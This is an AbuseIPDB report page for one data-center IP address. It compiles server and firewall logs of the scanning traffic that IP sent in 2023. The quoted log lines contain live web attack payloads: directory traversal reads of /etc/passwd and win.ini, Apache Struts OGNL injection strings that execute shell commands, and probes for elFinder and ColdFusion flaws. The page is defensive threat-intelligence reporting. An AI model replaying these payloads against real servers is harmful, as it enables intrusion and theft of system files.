JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 45.145.75.23

45.145.75.23 was found in our database!

This IP was reported 37 times. Confidence of Abuse is 0%: ?

ISP	Spartan Host Ltd
Usage Type	Data Center/Web Hosting/Transit
ASN	AS201106
Domain Name	spartanhost.org
Country	🇺🇸 United States of America
City	Seattle, Washington

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 45.145.75.23

Whois 45.145.75.23

IP Abuse Reports for 45.145.75.23:

This IP address has been reported a total of 37 times from 11 distinct sources. 45.145.75.23 was first reported on April 30th 2023, and the most recent report was 2 years ago.

Old Reports: The most recent abuse report for this IP address is from 2 years ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇻🇳 Xuan Can	2023-08-22 12:11:19 (2 years ago)	(mod_security) mod_security (id:77316730) triggered by 45.145.75.23 (US/United States/-): 1 in the l ... show more (mod_security) mod_security (id:77316730) triggered by 45.145.75.23 (US/United States/-): 1 in the last 3600 secs; Ports: 80,443; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Aug 22 19:11:11.201541 2023] [security2:error] [pid 5607:tid 47680726259456] [client 45.145.75.23:64754] [client 45.145.75.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\/(?:lib\|elfinder)\\\\/php\\\\/connector\\\\.minimal\\\\.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_4_wordpress.conf"] [line "369"] [id "77316730"] [msg "IM360 WAF: WordPress plugin File Manager < 6.9 & Elfinder 2.1.47 - Remote Code Execution\|\|T:APACHE\|\|REQUEST_FILENAME:.../lib/php/connector.minimal.php\|\|"] [severity "CRITICAL"] [tag "service_i360custom"] [hostname "kb.pavietnam.vn"] [uri "/elFinder/php/connector.minimal.php"] [unique_id "ZOSl39fWnaPjJ0GgKhz_kgAAAFY"] show less	Brute-Force SSH
🇻🇳 Xuan Can	2023-07-10 21:35:53 (2 years ago)	(mod_security) mod_security (id:77140166) triggered by 45.145.75.23 (US/United States/-): 1 in the l ... show more (mod_security) mod_security (id:77140166) triggered by 45.145.75.23 (US/United States/-): 1 in the last 3600 secs; Ports: 80,443; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Jul 11 04:35:48.048249 2023] [security2:error] [pid 14738:tid 47084112279296] [client 45.145.75.23:64224] [client 45.145.75.23] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "/windows/win.ini" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_1_generic.conf"] [line "20"] [id "77140166"] [msg "IM360 WAF: Blocking directory traversal attempt\|\|MVN:MATCHED_VAR\|\|MV:../../../../windows/win.ini\|\|T:APACHE\|\|"] [severity "CRITICAL"] [tag "service_gen"] [hostname "sieuthimaychu.vn"] [uri "/casmain.xgi"] [unique_id "ZKx5tFWBKiAceOnolrYZ3AAAAVQ"] show less	Brute-Force SSH
🇹🇼 chaoym	2023-06-24 14:07:48 (2 years ago)	* Local File Inclusion $_POST['Language_S'] => ../../../../windows/win.ini * Local File Inclusion $ ... show more * Local File Inclusion $_POST['Language_S'] => ../../../../windows/win.ini * Local File Inclusion $_REQUEST['Language_S'] => ../../../../windows/win.ini show less	SQL Injection
Anonymous	2023-06-23 02:35:32 (2 years ago)	45.145.75.23 - - \[23/Jun/2023:10:35:32 +0800\] \"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\" 404 ... show more 45.145.75.23 - - \[23/Jun/2023:10:35:32 +0800\] \"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Windows NT 10.0\; WOW64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/89.0.4389.114 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-23 01:15:01 (3 years ago)	45.145.75.23 - - \[23/Jun/2023:09:15:00 +0800\] \"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMet ... show more 45.145.75.23 - - \[23/Jun/2023:09:15:00 +0800\] \"GET /%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Windows NT 5.1$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/34.0.1866.237 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-22 23:15:24 (3 years ago)	45.145.75.23 - - \[23/Jun/2023:07:15:23 +0800\] \"GET /securityRealm/user/admin/descriptorByName/org ... show more 45.145.75.23 - - \[23/Jun/2023:07:15:23 +0800\] \"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword\?apiUrl=http://saZzmoSzjdUo. HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/55.0.2919.83 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-22 21:53:11 (3 years ago)	45.145.75.23 - \[23/Jun/2023:05:53:09 +0800\] \"GET /_next/../../../../../../../../../../etc/passwd ... show more 45.145.75.23 - \[23/Jun/2023:05:53:09 +0800\] \"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1\" 400 150 \"-\" - 45.145.75.23 0.159 - - - - - US TLSv1.3 45.145.75.23 - \[23/Jun/2023:05:53:09 +0800\] \"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1\" 400 150 \"-\" - 45.145.75.23 0.163 - - - - - US TLSv1.3 show less	Web App Attack
Anonymous	2023-06-22 19:24:35 (3 years ago)	45.145.75.23 - - \[23/Jun/2023:03:24:33 +0800\] \"GET /index.action\?cmd=cat%20/etc/passwd\&encoding ... show more 45.145.75.23 - - \[23/Jun/2023:03:24:33 +0800\] \"GET /index.action\?cmd=cat%20/etc/passwd\&encoding=UTF-8\&method:%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse,%23res.setCharacterEncoding$%23parameters.encoding%5B0%5D$,%23w%3d%23res.getWriter,%23s%3dnew+java.util.Scanner$@java.lang.Runtime@getRuntime\($.exec$%23parameters.cmd%5B0%5D$.getInputStream\).useDelimiter$%23parameters.pp%5B0%5D$,%23str%3d%23s.hasNext%3f%23s.next%3a%23parameters.ppp%5B0%5D,%23w.print$%23str$,%23w.close,1\?%23xx:%23request.toString\&pp=%5C%5CA\&ppp=%20 HTTP/1.1\" 301 8141 \"-\" \"Mozilla/5.0 $Windows NT 10.0\; WOW64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/89.0.4389.114 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-22 18:21:42 (3 years ago)	45.145.75.23 - - \[23/Jun/2023:02:21:41 +0800\] \"GET /CFIDE/administrator/enter.cfm\?locale=../../. ... show more 45.145.75.23 - - \[23/Jun/2023:02:21:41 +0800\] \"GET /CFIDE/administrator/enter.cfm\?locale=../../../../../../../lib/password.properties%00en HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Windows NT 6.1$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/41.0.2228.0 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-22 03:19:44 (3 years ago)	45.145.75.23 - - \[22/Jun/2023:11:19:43 +0800\] \"GET /common/download/resource\?resource=/profile/. ... show more 45.145.75.23 - - \[22/Jun/2023:11:19:43 +0800\] \"GET /common/download/resource\?resource=/profile/../../../../etc/passwd HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Windows NT 4.0\; WOW64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/37.0.2049.0 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-21 23:56:46 (3 years ago)	45.145.75.23 - \[22/Jun/2023:07:56:45 +0800\] \"GET /include/thumb.php\?dir=http\\x5C..\\x5Cadmin\\x ... show more 45.145.75.23 - \[22/Jun/2023:07:56:45 +0800\] \"GET /include/thumb.php\?dir=http\\x5C..\\x5Cadmin\\x5Clogin\\x5Clogin_check.php HTTP/1.1\" 404 249 \"-\" Mozilla/5.0 $Macintosh\; Intel Mac OS X 10_9_2$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/52.0.2762.73 Safari/537.36 45.145.75.23 0.003 0.004 10.10.10.78:80 404 - - US TLSv1.3 show less	Web App Attack
Anonymous	2023-06-21 13:26:53 (3 years ago)	45.145.75.23 - - \[21/Jun/2023:21:26:52 +0800\] \"GET /site_admin/user/login HTTP/1.1\" 404 6099 \"- ... show more 45.145.75.23 - - \[21/Jun/2023:21:26:52 +0800\] \"GET /site_admin/user/login HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Macintosh\; Intel Mac OS X 10_9_2$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/36.0.1944.0 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-20 15:12:37 (3 years ago)	45.145.75.23 - - \[20/Jun/2023:23:12:35 +0800\] \"GET /admin/login/\?next=/admin/ HTTP/1.1\" 404 609 ... show more 45.145.75.23 - - \[20/Jun/2023:23:12:35 +0800\] \"GET /admin/login/\?next=/admin/ HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $Macintosh\; Intel Mac OS X 10_8_4$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/49.0.2656.18 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-20 10:40:14 (3 years ago)	45.145.75.23 - - \[20/Jun/2023:18:40:13 +0800\] \"GET /arcgis/admin/login HTTP/1.1\" 404 6099 \"-\" ... show more 45.145.75.23 - - \[20/Jun/2023:18:40:13 +0800\] \"GET /arcgis/admin/login HTTP/1.1\" 404 6099 \"-\" \"Mozilla/5.0 $X11\; Ubuntu\; Linux x86_64$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/55.0.2919.83 Safari/537.36\" show less	Web App Attack
Anonymous	2023-06-20 08:57:48 (3 years ago)	45.145.75.23 - - \[20/Jun/2023:16:57:47 +0800\] \"GET /adminer.php HTTP/1.1\" 404 6034 \"-\" \"Mozil ... show more 45.145.75.23 - - \[20/Jun/2023:16:57:47 +0800\] \"GET /adminer.php HTTP/1.1\" 404 6034 \"-\" \"Mozilla/5.0 $Windows NT 6.1$ AppleWebKit/537.36 $KHTML, like Gecko$ Chrome/41.0.2228.0 Safari/537.36\" show less	Web App Attack

Showing 1 to 15 of 37 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇹🇭 110.164.193.195

🇫🇮 2a00:1450:4010:c1c::12c

🇳🇱 193.176.31.152

🇨🇴 186.97.116.170

🇧🇷 179.48.242.54

🇳🇱 176.65.139.181

🇰🇿 149.27.89.129

🇺🇸 103.203.57.12

🇷🇺 91.219.151.244

🇺🇸 91.193.232.32

🇨🇦 85.217.149.9

🇷🇴 80.94.92.164

🇺🇸 74.125.224.45

🇺🇸 64.57.129.18

🇳🇱 34.178.2.66

🇫🇮 2a00:1450:4010:c0e::128

🇳🇱 172.235.173.150

🇺🇸 134.209.49.169

🇻🇳 113.179.111.227

🇰🇷 112.216.129.27